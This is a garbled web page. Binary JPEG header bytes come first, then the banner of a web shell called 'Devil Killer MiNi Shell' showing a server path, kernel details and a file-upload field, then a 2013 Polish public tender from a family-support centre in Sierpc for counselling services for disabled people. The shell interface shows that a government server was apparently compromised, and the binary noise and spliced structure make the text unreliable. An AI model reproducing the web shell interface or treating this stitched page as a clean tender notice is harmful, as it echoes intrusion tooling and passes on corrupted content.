JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130520/81433-N-2013.html

<p class="kh_header"><b>Sierpc: ŚWIADCZENIE USŁUG PORADNICTWA SPECJALISTYCZNEGO W RAMACH PROJEKTÓW:
PRACA - TRZEBA DZIAŁAĆ A NIE CZEKAĆ ORAZ ASYSTENT OSOBY NIEPEŁNOSPRAWNEJ - REALNA POMOC I WSPARCIE 7.4  POKL</b><br>
<b>Numer ogłoszenia: 81433 - 2013; data zamieszczenia: 20.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Świętokrzyska 2A, 09-200 Sierpc, woj. mazowieckie, tel. 24 2757660, faks 24 2757660.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pcprsierpc.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG PORADNICTWA SPECJALISTYCZNEGO W RAMACH PROJEKTÓW:
PRACA - TRZEBA DZIAŁAĆ A NIE CZEKAĆ ORAZ ASYSTENT OSOBY NIEPEŁNOSPRAWNEJ - REALNA POMOC I WSPARCIE 7.4  POKL.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Poradnictwo psychologiczne dla 30 uczestników projektu Praca - trzeba działać 
a nie czekać - 120 godzin
Doradztwo zawodowe  dla 30 uczestników projektu Praca - trzeba działać 
a nie czekać  - 90 godzin
Warsztaty terapeutyczne dla dzieci  z otoczenia grupy docelowej - uczestników projektu Praca - trzeba działać  a nie czekać - 25godzin
Konsultacje indywidualne i spotkania warsztatowe dla 30 osób z wizażystą lub stylistą w ramach projektu Praca - trzeba działać a nie czekać - 90 godzin, akademia wizerunku
Poradnictwo psychologiczne dla 20 uczestników projektu Asystent Osoby Niepełnosprawnej - realna pomoc i wsparcie - 100 godzin
Doradztwo zawodowe  dla 20 uczestników projektu Asystent Osoby Niepełnosprawnej - realna pomoc i wsparcie - 60 godzin
Grupowe warsztaty prawnicze dla 20 uczestników projektu: AON - realna pomoc 
i wsparcie - 20 GODZIN
Warsztaty psychologiczne dla 20 uczestników w zakresie umiejętności korzystania 
z usług Asystentów osób niepełnosprawnych - 60 godzin.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6, 85.31.23.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że dysponuje i/lub będzie dysponował osobą/osobami, które będą odpowiedzialne za świadczenie usług i spełnią przedstawione niżej warunki:

1. Poradnictwo psychologiczne dla 30 uczestników projektu Praca - trzeba działać a nie czekać - 120 godzin 
Co najmniej 1 osoba która posiada:
-wykształcenie wyższe magisterskie, kierunek psychologia,
-doświadczenie w pracy w zawodzie psychologa (minimum 2 lata w okresie styczeń 2010-grudzień 2012)
-świadczyła w przeszłości (w okresie styczeń 2010-grudzień 2012) co najmniej dwie usługi o tematyce tożsamej z zamawianą.

2.Doradztwo zawodowe  dla 30 uczestników projektu Praca - trzeba działać a nie czekać  - 90 godzin 
Co najmniej 1 osoba która posiada:
- wykształcenie wyższe magisterskie z uprawnieniami doradcy zawodowego,
-doświadczenie w pracy w zawodzie doradcy zawodowego (minimum 2 lata w okresie styczeń 2010-grudzień 2012)
-świadczyła w przeszłości (w okresie styczeń 2010-grudzień 2012) co najmniej dwie usługi o tematyce tożsamej z zamawianą.

3. Warsztaty terapeutyczne dla dzieci z otoczenia grupy docelowej - uczestników projektu Praca - trzeba działać a nie czekać - 25godzin 
Co najmniej 1 osoba, która posiada:
- wykształcenie wyższe magisterskie, kierunek psychologia, socjoterapia, pedagogika specjalna lub pokrewny
- minimum 2-letnie (w okresie styczeń 2010-grudzień 2012) doświadczenie w pracy z dziećmi i młodzieżą (w charakterze psychologa, pedagoga specjalnego, socjoterapeuty). 

4.Konsultacje indywidualne i spotkania warsztatowe z wizażystą lub stylistą w ramach projektu Praca - trzeba działać a nie czekać - 90 godzin, akademia wizerunku 
Co najmniej 3 osoby, w tym:
-FRYZJER - co najmniej 1 osoba, która posiada kierunkowe wykształcenie minimum zawodowe; umiejętności zawodowe- fryzjer/stylista; doświadczenie zawodowe fryzjera (minimum 2 lata w okresie styczeń 2010-grudzień 2012); mile widziane  kursy, szkolenia w tym zakresie. Obowiązki: dobór fryzury, strzyżenie, koloryzacja, upięcia, pielęgnacja.
- KOSMETYCZKA - co najmniej 1 osoba, która posiada kierunkowe wykształcenie minimum zawodowe; umiejętności zawodowe kosmetyczka/stylista; doświadczenie zawodowe kosmetyczki (minimum 2 lata w okresie styczeń 2010-grudzień 2012); mile widziane  kursy, szkolenia w tym zakresie. Obowiązki: wykonywanie zabiegów na twarz i ciało, manicure, pedicure, itp. 
- WIZAŻYSTA/STYLISTA - co najmniej 1 osoba, która posiada kierunkowe wykształcenie: wizażysta/stylista/kosmetolog; umiejętności zawodowe wizażysta/stylista; doświadczenie zawodowe wizażysty/stylisty (minimum 2 lata); mile widziane  kursy, szkolenia w tym zakresie. 
Obowiązki: współpraca z fryzjerem, kosmetyczką 
w zakresie doboru wykonywanych przez nich zabiegów, prowadzenie warsztatów grupowych 
i poradnictwa indywidualnego o tematyce: poprawa autoprezentacji, typy kolorystyczne, typy sylwetki, kolorystyka garderoby, dobór makijażu i fryzury, tworzenie indywidualnego stylu, pomoc (doradztwo-wspólne zakupy z uczestnikiem) celem skompletowania stroju na rozmowę kwalifikacyjną.

5.Poradnictwo psychologiczne dla 20 uczestników projektu Asystent Osoby Niepełnosprawnej - realna pomoc i wsparcie - 100 godzin
Co najmniej 1 osoba, która posiada:
-wykształcenie wyższe magisterskie, kierunek psychologia,
-doświadczenie w pracy w zawodzie psychologa (minimum 2 lata w okresie styczeń 2010-grudzień 2012)
-świadczyła w przeszłości (w okresie styczeń 2010-grudzień 2012) co najmniej dwie usługi o tematyce tożsamej z zamawianą.

6.Doradztwo zawodowe  dla 20 uczestników projektu Asystent Osoby Niepełnosprawnej - realna pomoc i wsparcie - 60 godzin
Co najmniej 1 osoba która posiada:
- wykształcenie wyższe magisterskie z uprawnieniami doradcy zawodowego,
-doświadczenie w pracy w zawodzie doradcy zawodowego (minimum 2 lata w okresie styczeń 2010-grudzień 2012)
-świadczyła w przeszłości (w okresie styczeń 2010-grudzień 2012) co najmniej dwie usługi 
o tematyce tożsamej z zamawianą.

7.Grupowe warsztaty prawnicze dla 20 uczestników projektu: AON - realna pomoc i wsparcie - 20 GODZIN

Co najmniej 1 osoba która posiada:
- wykształcenie wyższe magisterskie kierunek prawo
-doświadczenie w pracy w zawodzie prawnika (minimum 3 lata w okresie styczeń 2008-drudzień 2012)

8.Warsztaty psychologiczne dla 20 uczestników w zakresie umiejętności korzystania z usług Asystentów osób niepełnosprawnych - 60 godzin

Co najmniej 1 osoba, która posiada:
-wykształcenie wyższe magisterskie, kierunek psychologia,
-doświadczenie w pracy w zawodzie psychologa (minimum 2 lata w okresie styczeń 2010-grudzień 2012)
-świadczyła w przeszłości (w okresie styczeń 2010-grudzień 2012) co najmniej dwie usługi o tematyce tożsamej z zamawianą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>-	w uzasadnionych przypadkach za zgodą Zamawiającego możliwa jest zmiana terminu realizacji zamówienia jeżeli dotrzymanie terminu nie będzie możliwe z przyczyn nie leżących po stronie Wykonawcy,
-	osoby wskazane w ofercie jako odpowiedzialne za świadczenie usług za zgodą Zamawiającego będą mogły zostać zastąpione innymi o nie niższych kwalifikacjach, doświadczeniu i wykształceniu,
-	zmianie mogą podlegać omyłki pisarskie nie rzutujące na zamiar i cel stron wynikający 
z umowy,
-	w przypadku zmian na liście Uczestników projektu ilość osób biorących udział 
w poszczególnych zajęciach może ulec zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pcprsierpc.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie, ul. Świętokrzyska 2a, 09-200 Sierpc.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2013 godzina 10:00, miejsce: Siedziba Powiatowego Centrum Pomocy Rodzinie, Sierpc, 
ul. Świętokrzyska 2a, pok. Nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekty są w 85% współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Dzialanie 7.4 POKL Niepełnosprawni na rynku pracy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Poradnictwo psychologiczne dla 30 uczestników projektu Praca - trzeba działać 
a nie czekać - 120 godzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lata 2013-2014 - 30 uczestników (100% z niepełnosprawnością). 
Rok 2013:  30uczestników*średnio 2 godziny konsultacji indywidualnych 
na 1 osobę = 60 godzin. 
Spotkania warsztatowe 2013: 2 grupy*15h dla 1 grupy=30godzin                                                     
Spotkania warsztatowe 2014: 2 grupy*15h dla 1 grupy=30godzin 
Termin:  maj - lipiec 2013 r., styczeń-czerwiec 2014r.
Miejsce: Sierpc, siedziba Zamawiającego
Kod Wspólnotowego Słownika Zamówień:   (CPV) - 85121270-6 Usługi psychiatryczne lub psychologiczne
Harmonogram: konsultacje indywidualne od poniedziałku do soboty, 
(grafik dostosowany do preferencji i możliwości uczestników, ze szczególnym uwzględnieniem potrzeb osób niepełnosprawnych), spotkania grupowe 4-6 godzinne,
Wyżywienie: catering zapewniony przez Zamawiającego (kawa, herbata, kanapki, ciasto)

Celem poradnictwa psychologicznego jest: trening kompetencji i umiejętności społecznych, wsparcie rozwoju osobistego a także kształtowanie umiejętności komunikacji interpersonalnej.
Zakres poradnictwa psychologicznego:
Autoprezentacja,
komunikacja interpersonalna z elementami asertywności, 
kreatywność i nastawienie do zmian,
trening twórczego myślenia,
metody radzenia sobie ze stresem i przezwyciężania problemów życiowych, zwłaszcza ograniczeń związanych z niepełnosprawnością,
zwiększenie poczucia wpływu na własne życie i możliwości dokonywania świadomych wyborów,
wzmocnienie samooceny i poczucia własnej wartości, 
nauka stawiania sobie celów i sposobów ich realizacji,
nauka zarządzania czasem, trening interpersonalny,
zagadnienia istniejących stereotypów i równości płci,
inne elementy uznane przez Wykonawcę za istotne.

Obowiązki Wykonawcy:
Przygotowanie ramowego programu (konspektu) zajęć;
Oznakowanie Sali zgodnie z zasadami dot. promocji projektów finansowanych ze środków EFS;
Wystawienie każdemu uczestnikowi zaświadczenia/dyplomu/certyfikatu;
Dokumentowanie własnej pracy: karty czasu pracy, listy obecności, ewidencja udzielonych konsultacji, ostateczne opinie, zdjęcia;
Prowadzenie konsultacji wg ustalonego z koordynatorem projektu harmonogramu;
Przygotowanie w porozumieniu z doradcą zawodowym indywidualnych planów działania dla uczestników;
Przekazanie każdemu uczestnikowi niezbędnych materiałów i pomocy dydaktycznych właściwie oznakowanych logotypami;
Dokonania wpisu o szkoleniu/doradztwie specjalistycznym na stronie www.inwestycjewkadry.info.pl w terminie przewidzianym w umowie 
z Zamawiającym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 10.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Doradztwo zawodowe  dla 30 uczestników projektu Praca - trzeba działać a nie czekać  - 90 godzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 30 uczestników (100% z niepełnosprawnością). 
Rok 2013:  30uczestników*1 godzina konsultacji indywidualnych na 1 osobę = 30 godzin. 
Spotkania warsztatowe 2013: 2 grupy*30h dla 1 grupy=60godzin 
Termin: maj-czerwiec 2013r.
Miejsce: Sierpc, siedziba Zamawiającego
Kod Wspólnotowego Słownika Zamówień:   CPV 85312320-8 Usługi doradztwa
Harmonogram: konsultacje indywidualne od poniedziałku do soboty, 
(grafik dostosowany do preferencji i możliwości uczestników, ze szczególnym uwzględnieniem potrzeb osób niepełnosprawnych), spotkania grupowe 4-6 godzinne,
Wyżywienie: catering zapewniony przez Zamawiającego (kawa, herbata, kanapki, ciasto)
Celem szkolenia indywidualnego jest określenie ścieżki rozwoju zawodowego uczestników projektu, poprzez wypracowanie IPD (Indywidualnego Planu Działania). 
IPD powinien zawierać:
diagnozę stanu wyjściowego, rozpoznanie oczekiwań i potrzeb uczestnika projektu w tym m.in. przebieg kariery edukacyjno-zawodowej (wykształcenie, szkolenie, doświadczenie zawodowe), zainteresowania uczestnika projektu; 
określenie trudności zawodowych, rozpoznanie celów zawodowych;
strategię działania określającą szczegółowy sposób realizacji założonych celów zawodowych. 
Cele grupowego doradztwa zawodowego (Trening Pracy):
omówienie technik i aktywnych metod poszukiwania pracy
trening motywacji
nauka skutecznego i aktywnego poszukiwania pracy
proces wytyczania celów i priorytetów
zasady przygotowania dokumentów aplikacyjnych 
przygotowanie do rozmowy kwalifikacyjnej
nauka zasad autoprezentacji i komunikacji podczas rozmowy kwalifikacyjnej
metody radzenia sobie ze stresem
warsztaty Savoir Vivre w kontakcie z pracodawcą i współpracownikami
inne elementy uznane przez Wykonawcę za istotne, z uwzględnieniem perspektywy niepełnosprawności.

Obowiązki Wykonawcy:
Przygotowanie ramowego programu (konspektu) zajęć;
Oznakowanie Sali zgodnie z zasadami dot. promocji projektów finansowanych ze środków EFS;
Wystawienie każdemu uczestnikowi zaświadczenia/dyplomu/certyfikatu;
Dokumentowanie własnej pracy: karty czasu pracy, listy obecności, ewidencja udzielonych konsultacji, ostateczne opinie, zdjęcia;
Prowadzenie konsultacji wg ustalonego z koordynatorem projektu harmonogramu;
Przygotowanie w porozumieniu z psychologiem indywidualnych planów działania dla uczestników;
Przekazanie każdemu uczestnikowi niezbędnych materiałów i pomocy dydaktycznych właściwie oznakowanych logotypami;
Dokonania wpisu o szkoleniu/doradztwie specjalistycznym na stronie www.inwestycjewkadry.info.pl w terminie przewidzianym w umowie 
z Zamawiającym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warsztaty terapeutyczne dla dzieci 
z otoczenia grupy docelowej - uczestników projektu Praca - trzeba działać 
a nie czekać - 25godzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rok 2013; spotkania warsztatowe 2013- 1 lub 2grupy=25godzin 
Czas realizacji zamówienia: czerwiec - sierpień 2013r. 
Miejsce świadczenia usług: siedziba Zamawiającego
Wyżywienie: catering zapewniony przez Zamawiającego (napoje,  herbata, kanapki, ciasto)

Obowiązki Wykonawcy: 
Przygotowanie ramowego programu (konspektu) zajęć;
Oznakowanie Sali zgodnie z zasadami dot. promocji projektów finansowanych ze środków EFS;
Wystawienie każdemu uczestnikowi zaświadczenia/dyplomu/certyfikatu;
Dokumentowanie własnej pracy: karty czasu pracy, listy obecności, ewidencja udzielonych konsultacji, ostateczne opinie, zdjęcia;
Prowadzenie konsultacji wg ustalonego z koordynatorem projektu harmonogramu;
Przekazanie każdemu uczestnikowi niezbędnych materiałów i pomocy dydaktycznych właściwie oznakowanych logotypami;
